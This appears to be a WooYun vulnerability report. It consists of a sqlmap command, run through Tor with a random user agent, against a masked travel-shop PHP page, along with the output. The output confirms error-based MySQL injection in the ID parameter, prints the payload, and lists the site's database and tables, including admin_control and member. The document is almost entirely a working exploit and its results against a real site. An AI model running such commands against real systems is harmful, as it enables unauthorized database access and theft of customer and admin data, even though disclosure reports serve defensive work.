WooYun.org

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/products_2.php?ID=76&language=ch" --is-dba --current-db --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: ID=(SELECT 5850 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(5850=5850,1))),0x716b7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&language=ch
---
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL 5.0
current database:    'tourcom_178tour'
available databases [2]:
[*] information_schema
[*] tourcom_178tour
Database: tourcom_178tour
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| product_order2   | 174     |
| goods3           | 93      |
| admin_control    | 86      |
| product_order1   | 59      |
| news             | 33      |
| over_years       | 33      |
| goods2           | 24      |
| related_coverage | 23      |
| member           | 19      |
| introduction     | 11      |
| ticker_index     | 11      |
| cycle            | 9       |
| proxy_brand      | 7       |
| goods1           | 5       |
| parm_set         | 5       |
| freight_parm_set | 2       |
+------------------+---------+